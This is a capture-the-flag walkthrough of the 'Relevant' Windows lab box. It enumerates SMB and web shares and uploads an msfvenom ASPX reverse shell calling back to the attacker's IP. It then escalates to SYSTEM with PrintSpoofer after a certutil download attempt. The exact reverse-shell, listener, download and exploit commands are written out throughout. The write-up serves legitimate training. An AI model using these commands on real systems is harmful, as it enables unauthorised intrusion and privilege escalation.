Relevant

Nmap Scan

$ nmap -A -T4 -p- 10.10.233.103

I'll open up my browser to see what's running on the webserver.

Default Webpage for IIS

Just a default webpage. Looking at the webpage doesn't reveal anything either. Let's use gobuster to search for hidden directories.

We find that there is a hidden directory at /nt4wrksv. Let's open it up.

Just a blank page

We find a blank page only. Viewing the source code doesn't reveal anything helpful either.

Since we have smb, I will use the smbclient tool to enumerate port 139.

We have a web share: nt4wrksv. The same one as the one we found in our web server. Hmm... interesting. Let's see what's in it.

We get a passwords.txt file. That's interesting. Let's view it's contents.

We get some encoded user passwords. They seem to be in base64. Let's try decoding them.

Success, we retrieve some credentials.

(Disclaimer: the creator of the room in his walkthrough video https://youtu.be/VfadeHqnuZc?t=260 says he put those credentials there to confuse people. The point of the challenge is to discourage the "Try Harder" mentality. People should try something else). As we can see from the screenshot below, we will not be able to login to evil-winrm (or psexec or smb) using the credentials we found. So we need to enumerate further.

SInce the name of the share is similar to the directory we found on the website, let's see if we can navigate to it via the web browser, and access the passwords.txt file.

Success

NB: There was another website at port 49663. It didn't appear in my initial nmap scan results. The website from where I can access the passwords.

After a quick test, I found out we have upload rights to the smb share, and we can access whatever we upload via the website. This gives me an idea for a reverse shell.

Uploading a test file i created
Accessing the test file

I'll use msfvenom to generate an aspx payload, which we can then upload to smb.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.17.44 LPORT=4444 -f aspx -o rev.aspx
Generating Payload
Uploading payload to smb share

Now let's set up our listener.

nc -nvlp 4444

And let's execute our payload by navigating to the rev.aspx file on our browser.

Executing payload
Success

Success! We got our initial foothold.

We are now going to exploit the printspoofer vulnerability. You can read more about it on the link below, and download it on your machine. It allowed service accounts to occassionally access the system user on Windows Server 2016, Server 2019, and Windows 10.

LogoGitHub - dievus/printspooferGitHub

The exploit works by using the SeImpersonatePrivilege. When you see something like this, you may consider a potato attack, or incognito. (However, both attacks won't work in this box. For incogito, we don't have a token and for the potato attack dcom has been disabled).

Let's open up a python server on our machine.

Now let's navigate to the website's root directory.

VIewing our files

At this point, we will perform a file transfer. We want a copy of the printspoofer exploit on this WIndows machine.

certutil -urlcache -f http://10.9.17.44/PrintSpoofer.exe printspoofer.exe

Hmm, an error occured.

Let's try another way to transfer the file.

We will just use smb to upload the PrintSPoofer.exe file.

Success

And it's right where we want it :)

Let's execute our exploit.

PrintSpoofer.exe -i -c cmd

The -i flag is for interact and the -c flag is for command.

Boom!!!!

Now let's go retrieve our flags.

User flag retrieved
Admin flag retrieved

And we are done! :D

PreviousMr Robot CTFNextAttacktive Directory

Last updated

Was this helpful?